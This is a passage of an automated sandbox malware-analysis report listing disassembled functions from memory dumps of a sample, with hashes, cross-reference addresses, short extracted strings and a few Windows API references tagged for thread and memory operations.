Instruction ID: c7718bad5af61883477eb5209a811aec503d281806f7eb74708f56cc069fd011
Opcode Fuzzy Hash: bd31d902af7b7a980b9a6227e7ec4cb9f04de55b86ef3c81ec59f177774455b1
Instruction Fuzzy Hash: C8225870D04219CFDB18DFA8C495AECFBB2FF49304F148269D41AEB246DA34A985CF94

Function 00007FFAAC43C165 Relevance: 5.3, Strings: 4, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC43C324
r6, xrefs: 00007FFAAC43C354
r6, xrefs: 00007FFAAC43C298
bH_H, xrefs: 00007FFAAC43C35E

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: bH_H$r6$r6$r6
API String ID: 0-619151002
Opcode ID: c0d80eb1d565c979db20f6d1555a3eeb45d51d786e137d03c0e6c992cb647524
Instruction ID: 039b417122424b1175cee624ced37b6eac68c9e447bbbb244dca43fd89001efa
Opcode Fuzzy Hash: c0d80eb1d565c979db20f6d1555a3eeb45d51d786e137d03c0e6c992cb647524
Instruction Fuzzy Hash: 9C910371D1DB498FEB88CB6888591A97BE2FFDA304F04427AD04DE7392CE2898058795

Function 00007FFAAC95C4D2 Relevance: 4.1, Strings: 3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC95C533
r6, xrefs: 00007FFAAC95C583
r6, xrefs: 00007FFAAC95C832

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6$r6$r6
API String ID: 0-701349563
Opcode ID: 7da5a1a0f3340929a75ed8c7681fb3a3541db3e5af3c28af5ec1e94bf9bdb179
Instruction ID: 6db83916052eec758806a8792ba82a521dc649f44eda2eaa8ebaa92314deca8d
Opcode Fuzzy Hash: 7da5a1a0f3340929a75ed8c7681fb3a3541db3e5af3c28af5ec1e94bf9bdb179
Instruction Fuzzy Hash: 61C1C274A19A4A8FE749DB68C0906A4B7E1FF5A300F54817DD04EC7AC6DB28F859CBC0

Function 00007FFAAC41FAB9 Relevance: 4.0, Strings: 3, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p[, xrefs: 00007FFAAC41FC8D
r6, xrefs: 00007FFAAC41FD68
X, xrefs: 00007FFAAC41FB23

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC416000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac416000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: X$p[$r6
API String ID: 0-766787601
Opcode ID: 8a310deac08faaf37de4d3d94adc1c62b9402043bef0a566b28becc6a4847c21
Instruction ID: e3431f9a274ac20ed15aebd079df8f25a3ffe14cc241f3356c405ed8c9bac8dd
Opcode Fuzzy Hash: 8a310deac08faaf37de4d3d94adc1c62b9402043bef0a566b28becc6a4847c21
Instruction Fuzzy Hash: 0AB12974A08A1D8FEB94EF68C494BADB7F2FF59304F5041A9D04DD7292DB34A885CB41

Function 00007FFAAC955279 Relevance: 2.8, Strings: 2, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 00007FFAAC955466
/, xrefs: 00007FFAAC955336

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: /$/
API String ID: 0-972056843
Opcode ID: d257da9e58d2440e409ec511636c4c30589ceccde81e49fd5335aa33b43a748c
Instruction ID: 3c5937decd2415b0cc333ed73b484f491c09dc241116b0099198f4f06e6576d8
Opcode Fuzzy Hash: d257da9e58d2440e409ec511636c4c30589ceccde81e49fd5335aa33b43a748c
Instruction Fuzzy Hash: 4C71B171A189098FFB98EB6CD455AB977D2EF69300B1440BDE04EC72A7DE35EC468780

Function 00007FFAAC95C9B2 Relevance: 2.7, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFAAC95CA22
r6, xrefs: 00007FFAAC95C9D7

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: 358860cffee9d1ead95c3a0822735b61db96385773cda7081e5222fd6e325baf
Instruction ID: d6661319f53677e32ea6358f507041d1a039ca1aa5e82451b3ae60d58018eb2d
Opcode Fuzzy Hash: 358860cffee9d1ead95c3a0822735b61db96385773cda7081e5222fd6e325baf
Instruction Fuzzy Hash: 60515375D1964ECFEB49DBA8C4555BDBBB1EF4A300F10807DD00EE7292DA38A909CB91

Function 00007FFAAC95B04D Relevance: 2.6, Strings: 2, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC95B099
r6, xrefs: 00007FFAAC95B05B

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 102c261635f27bf2966d6450e246fc3babd27af5e9b5d26d84f48fa51262abfd
Instruction ID: 436e9cd926360930d41812f9e3c2e0b6c11668e37b3a26ab277c5ef670e037ea
Opcode Fuzzy Hash: 102c261635f27bf2966d6450e246fc3babd27af5e9b5d26d84f48fa51262abfd
Instruction Fuzzy Hash: 40316175A19A0ACFE758DB58D4916B8F7A1FF5A310B54813DD01EC3686CF24BC1A8BC0

Function 00007FFAAC95B10A Relevance: 2.6, Strings: 2, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC95B135
r6, xrefs: 00007FFAAC95B10B

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: b89935d811bff90f1a48217d49f9e1e59ada03675a8f0a1c6365eb020f51d4a2
Instruction ID: 5b6a41c3491927231cd7d8dd95755465c4e8d10e6d09385102740a213324b620
Opcode Fuzzy Hash: b89935d811bff90f1a48217d49f9e1e59ada03675a8f0a1c6365eb020f51d4a2
Instruction Fuzzy Hash: 6621D276A0DA4E8FF798E76894526E8B7D1FF5A350F44427DD04EC22C2ED28A80986C1

Function 00007FFAAC953AB4 Relevance: 2.2, Strings: 1, Instructions: 906
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 00007FFAAC954501

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: b67c3bca50526bd2a699f92aa5b148e47ae0b8c8c40761de96fbeba4d0aa8753
Instruction ID: 3ba298f9e95de59833e6467ead7f88f44586bca32b7e1fbbbcec82bebc051faf
Opcode Fuzzy Hash: b67c3bca50526bd2a699f92aa5b148e47ae0b8c8c40761de96fbeba4d0aa8753
Instruction Fuzzy Hash: A7623375618A1D8FEB88EB68C495F6977E2FF69704F1441A9D00EC72A2CE34EC45CB81

Function 00007FFAAC953C05 Relevance: 2.1, Strings: 1, Instructions: 894
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 00007FFAAC954501

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 1cec38354774b26a39b30bbd02e632d1adf98698ced10c8b857526d75db5a1db
Instruction ID: 54f97970c0185fe89701c73183935d2478885ffa7f543ce63cc025b8e4b6b7c9
Opcode Fuzzy Hash: 1cec38354774b26a39b30bbd02e632d1adf98698ced10c8b857526d75db5a1db
Instruction Fuzzy Hash: 25624375618A0D8FDB88EB28C495F6977E2FFA9704F1441A9D00EC72A2CE35EC45CB81

Function 00007FFAAC956502 Relevance: 1.9, Strings: 1, Instructions: 662
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 00007FFAAC9565A3

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 3b9457ff00038f324761f04afe321f554682e6490f26d98ea3e3e0f176762895
Instruction ID: 44ac034610b36f331e86ee8cab4e0fcc41c1dafc72983a7e2b2b29b9cc8db431
Opcode Fuzzy Hash: 3b9457ff00038f324761f04afe321f554682e6490f26d98ea3e3e0f176762895
Instruction Fuzzy Hash: 27322274618A198FDB88EB68C455FA973E1FF69700F1441A9E00EC73A6DE34ED85CB81

Function 00007FFAAC59F19D Relevance: 1.7, APIs: 1, Instructions: 192threadinjectionCOMMON

Download Yara Rule

APIs

SuspendThread.KERNEL32 ref: 00007FFAAC59F271

Memory Dump Source

Source File: 0000001E.00000002.2615331548.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac590000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: 43cbbbcdf8008655512639b20a7546061d95ed8f9e46e9200c6c34afc3e07e11
Instruction ID: 7918e02990c4ee8b4d5e8801448afbda4f0641959895cbc0622140fdeaa9adc9
Opcode Fuzzy Hash: 43cbbbcdf8008655512639b20a7546061d95ed8f9e46e9200c6c34afc3e07e11
Instruction Fuzzy Hash: 3D510970D0861D8FEB98DFA8D885AEDBBF0FB5A311F10416AD04DE7252DA75A885CF40

Function 00007FFAAC3F20CE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00007FFAAC3F220A

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3EF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3EF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac3ef000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a7128c133a87147e7fb278e553a2fcc433183f5fa167214c180263da1bdb2858
Instruction ID: 0c0a0ff38e15841f44bed35bff4279d9113600108601f93354487b0d84d7f344
Opcode Fuzzy Hash: a7128c133a87147e7fb278e553a2fcc433183f5fa167214c180263da1bdb2858
Instruction Fuzzy Hash: 65518070D08B4D8FDB54DFA8C845AEDBBF1FB56310F10826AD049E7251DB75A885CB80

Function 00007FFAAC5A0A37 Relevance: 1.7, APIs: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 00007FFAAC5A0B31

Memory Dump Source

Source File: 0000001E.00000002.2615331548.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac590000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c3b25d3ff62691a9a3768259c397fbe2e3a946cca399bfc267c2c30465e718da
Instruction ID: c4593fcb0fe3b0e74c0d4a1ab2b4e1f4b37f2cf00448df757d52cd396d014dfb
Opcode Fuzzy Hash: c3b25d3ff62691a9a3768259c397fbe2e3a946cca399bfc267c2c30465e718da
Instruction Fuzzy Hash: 9C516C7090C78C8FDB45DFA8D855AE9BBF0EF56310F0481AFD049DB2A2DA35A846CB51

Function 00007FFAAC5A2875 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFAAC5A2942

Memory Dump Source

Source File: 0000001E.00000002.2615331548.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac590000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cbb40ec3ca8dc54112ad86cad49949d6a4e3fb5d04866de8ce525e4776d53fa8
Instruction ID: bee6b2d17d182653e43939af4d0f7380ecc998a88952ede2f8f9492d405b5391
Opcode Fuzzy Hash: cbb40ec3ca8dc54112ad86cad49949d6a4e3fb5d04866de8ce525e4776d53fa8
Instruction Fuzzy Hash: 7741D870A0860C8FDB98DF98D489BADBBF0EB5A310F10416ED049E7252DA75A886CB44

Function 00007FFAAC95B94D Relevance: 1.6, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC95B9BF

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 4ab00ed8cb2303c82203451c9c5a51e3253608cbd54919cab99989d25e3c9541
Instruction ID: b6100eb949b8d48c839a75e70856df2952629379c3e8f22274bb0b52de5135d7
Opcode Fuzzy Hash: 4ab00ed8cb2303c82203451c9c5a51e3253608cbd54919cab99989d25e3c9541
Instruction Fuzzy Hash: E3A1347591EB8A8FF3699B2884515B5BBE0EF47310B14857ED08FC3193DE28A80E87C1

Function 00007FFAAC962892 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC96B7BF

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 277a6fdeda0864a7997cd244046d486be375cad6ee6fdfece54494bfb0f950ff
Instruction ID: 54da7b2e9f8ba1bf1846272230f554c1687f81f6d293caaedfa36aba30aeb65f
Opcode Fuzzy Hash: 277a6fdeda0864a7997cd244046d486be375cad6ee6fdfece54494bfb0f950ff
Instruction Fuzzy Hash: 90A1F676D09A5A8FFB589B6898556FDFBE0EFA5310F04417AD01ED72D2EE24980683C0

Function 00007FFAAC951AB0 Relevance: 1.6, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFAAC951D99

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: d4da56f6b5fe4fbbac944247f62e8b66f6267c23ffdd49f1100140e645cfcfee
Instruction ID: b1fe8f5b4ee8b90a0ef4567db16c08530adf9717c5715097441c4095974bee75
Opcode Fuzzy Hash: d4da56f6b5fe4fbbac944247f62e8b66f6267c23ffdd49f1100140e645cfcfee
Instruction Fuzzy Hash: 33C1CF34909B4A8FE799DB24C4945A9BBE1FF56300F40857ED44EC7A92DB39F849CB80

Function 00007FFAAC43D828 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

DH_H, xrefs: 00007FFAAC43E0EF

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: DH_H
API String ID: 0-245318711
Opcode ID: a350f511b06183c9f1b9eb5b52701522cb3d9e67cd0d4572f765cc22ab60cb5d
Instruction ID: 5b56037f58034fd8d7e9da439d7ff12a2d6e2fb0151777bd3bbe1a76ffc13ba5
Opcode Fuzzy Hash: a350f511b06183c9f1b9eb5b52701522cb3d9e67cd0d4572f765cc22ab60cb5d
Instruction Fuzzy Hash: 6681E572A29E098FEF98DB58C859AB977E1FBA5304F004179D00ED7395DE24EC468BC4

Function 00007FFAAC43D915 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFAAC43D939

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: c2d512834acd4b354b26cbf3b236643976a7dd7e5bfe2b35b2cc8acfbaf19c23
Instruction ID: 69c4d3209f4c49ba5abee93305bf349be81021bd019bd687232fa4303f84c43f
Opcode Fuzzy Hash: c2d512834acd4b354b26cbf3b236643976a7dd7e5bfe2b35b2cc8acfbaf19c23
Instruction Fuzzy Hash: AB711C93A1E7564BE610B77CB4769E93B90DF4227A71C81B7E08DCA2E3DC18D48982C4

Function 00007FFAAC9628D4 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC96B7BF

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 675274d3ce17f37647d65e6d104e1f1e04394ebfa7f4c08252382b0e37292873
Instruction ID: 07638b82a7dc8e504c1f2af1b4fc6bfbc2b84a2bc2a1b3c7b9a45f2f50a7672d
Opcode Fuzzy Hash: 675274d3ce17f37647d65e6d104e1f1e04394ebfa7f4c08252382b0e37292873
Instruction Fuzzy Hash: 2E61F371D09A1A8FFB58EB68C8556FDFBE0EF55311F00427AD00DE72D2EE25A8458780

Function 00007FFAAC95CC1F Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

b4, xrefs: 00007FFAAC95D0B2

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: b4
API String ID: 0-3371602342
Opcode ID: b1a4b460b4fadc7742fef9ae37a70bcad4242846b78a33531cc0b3e3bc37a115
Instruction ID: f16904710758726b06ff74a0197eb1f3e0262002fbaff08633354731fa3a5c36
Opcode Fuzzy Hash: b1a4b460b4fadc7742fef9ae37a70bcad4242846b78a33531cc0b3e3bc37a115
Instruction Fuzzy Hash: 7D81F43191955ACFEB19DF28D4A16B57BA1FF56300F1485BDC44ECB28BCA38E849C781

Function 00007FFAAC43D710 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

GH_H, xrefs: 00007FFAAC43DDEF

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: GH_H
API String ID: 0-472574937
Opcode ID: 85eae85c26e71c6495a7f8bc50fd29cbc36662b213f6a7ad716610f2858a7780
Instruction ID: a353686b902e5dd1e4da404da1247d2be6224e2fb0136f4b4b39f1ce2ec4bec6
Opcode Fuzzy Hash: 85eae85c26e71c6495a7f8bc50fd29cbc36662b213f6a7ad716610f2858a7780
Instruction Fuzzy Hash: D1514962A3DE8A4FF795E72C84196767BD1FFEA35070481BAD04EC7296CD18E80683C4

Function 00007FFAAC41FB2F Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

p[, xrefs: 00007FFAAC41FC8D

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC416000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac416000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: p[
API String ID: 0-2643120810
Opcode ID: 1fe5daffb5cf1ab2aa6e0b896e0d394f1b50e875893f0311640d029a3af42401
Instruction ID: 04a169dba63812241e6439c745fbfb135496066fc44852ea22a4fc4f87394433
Opcode Fuzzy Hash: 1fe5daffb5cf1ab2aa6e0b896e0d394f1b50e875893f0311640d029a3af42401
Instruction Fuzzy Hash: 0D71D774A1491D8FEB94EF68C894BA9B7F2FF59300F5081A9D00DE7292DA34AD85CF41

Function 00007FFAAC3F3ADA Relevance: 1.4, APIs: 1, Instructions: 174memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FFAAC3F3BDF

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3EF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3EF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac3ef000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 992914bfbc75a43a938dfeecaa98649cd535f52a0339ebd211770c2784b14ae8
Instruction ID: 5c3a8abf04e4a5b1ebef63889166b7b6de3fbb39b1f74d314b8f90705a7c0753
Opcode Fuzzy Hash: 992914bfbc75a43a938dfeecaa98649cd535f52a0339ebd211770c2784b14ae8
Instruction Fuzzy Hash: 6D510C70908A1C8FDF94EF68D845BE9BBF1FB69311F1081AAD04DE3251DB71A9858F80

Function 00007FFAAC951766 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

&, xrefs: 00007FFAAC9517F4

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: &
API String ID: 0-3042966939
Opcode ID: 7acc0609fc37010187cff8e741e37f1a7aecc090761aa6297508d6d751f3a261
Instruction ID: 031a933bc642ff0b13ecf3f9362738d9afb154515bee68a549ded297e614b04d
Opcode Fuzzy Hash: 7acc0609fc37010187cff8e741e37f1a7aecc090761aa6297508d6d751f3a261
Instruction Fuzzy Hash: 2B51A075D09A4ECFEB58DB54C8556F9B7A1FF56304F1482BDC00E97292CB38A84E8B80

Function 00007FFAAC5A0B99 Relevance: 1.4, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFAAC5A0C71

Memory Dump Source

Source File: 0000001E.00000002.2615331548.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac590000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b516fcffeafa78433363d10d00abf4bfc51541f00cf8691f03eda4a59038ec16
Instruction ID: c7e3d174aac81172a9ea1bef707727b180ccde123065f1fb206b3bb6cef5754a
Opcode Fuzzy Hash: b516fcffeafa78433363d10d00abf4bfc51541f00cf8691f03eda4a59038ec16
Instruction Fuzzy Hash: 89416A70D0874C8FDB58DFA8D889BECBBF0EF56310F1041AAD049E7292DA34A885CB41

Function 00007FFAAC9598D2 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC959903

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 83f8d38014a354c6d92f5c2587cbd6d8c4563471599dd2adb148be345e8958f6
Instruction ID: 62f8920850a8ae295da6def1c76ba5be6c0e93021b5d8d2756c12c7fcc9d7f2d
Opcode Fuzzy Hash: 83f8d38014a354c6d92f5c2587cbd6d8c4563471599dd2adb148be345e8958f6
Instruction Fuzzy Hash: 9A21F674A1891D8FEF98DB58C4A5AECB7B1FF6D304F0041AD900EE3291CE35A985CB41

Function 00007FFAAC955F7C Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC955FE8

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: fae317767d53ca39f5ca908f04b63c1165d2056adab6db8699be4fe3f24333ec
Instruction ID: 8334c187d1afef0fd1318a507f84546d0d7de7a62b0c39a5520ae435236eb7b7
Opcode Fuzzy Hash: fae317767d53ca39f5ca908f04b63c1165d2056adab6db8699be4fe3f24333ec
Instruction Fuzzy Hash: D3219F65A18A098FFB85AB78D455FB9B7D1EF59300F1081BDE00EC3292DD29A8898381

Function 00007FFAAC952181 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

, xrefs: 00007FFAAC952187

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5c437d808092da9382e17a96970d3f926f0800585895a91abf13cef41d2cff85
Instruction ID: 0161eca2c93e4f9fa49159dd7682962433cf7c88c6ab980707e84a3567fe4ecb
Opcode Fuzzy Hash: 5c437d808092da9382e17a96970d3f926f0800585895a91abf13cef41d2cff85
Instruction Fuzzy Hash: 7F110734E09609CFEB24DF58C885AADB7F0FF5A304F50516DD40E93291DB39A98ACB81

Function 00007FFAAC3E4812 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

w, xrefs: 00007FFAAC3E4874

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3E4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E4000, based on PE: false

Joe Sandbox IDA Plugin

